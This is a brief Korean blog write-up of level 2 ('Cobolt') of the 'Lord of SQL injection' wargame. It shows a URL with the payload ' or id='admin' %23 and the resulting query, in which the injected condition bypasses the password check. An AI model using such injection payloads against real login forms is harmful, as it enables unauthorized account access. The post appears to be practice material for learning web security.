Lord Of SQL injection [ 2.Cobolt ]
2017. 9. 8. 18:43ㆍWebHacking/Lord of SQL injection
URL: https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin&pw=1234' or id='admin' %23 |
=> SELECT id FROM prob_cobolt WHERE ( id='admin' and pw='hash값' ) or id='admin' #')
=> 뒤의 조건식 id=admin이 만족되어 쿼리문이 실행된다
'WebHacking > Lord of SQL injection' 카테고리의 다른 글
| Lord Of SQL Injection [ 6.DarkElf ] (0) | 2017.09.08 |
|---|---|
| Lord Of SQL Injection [ 5. Wolfman] (0) | 2017.09.08 |
| Lord Of SQL injection [ 4.Orc ] (0) | 2017.09.08 |
| Lord Of SQL injection [3.Goblin ] (0) | 2017.09.08 |
| Lord Of SQL injection [ 1.Gremlin ] (0) | 2017.09.08 |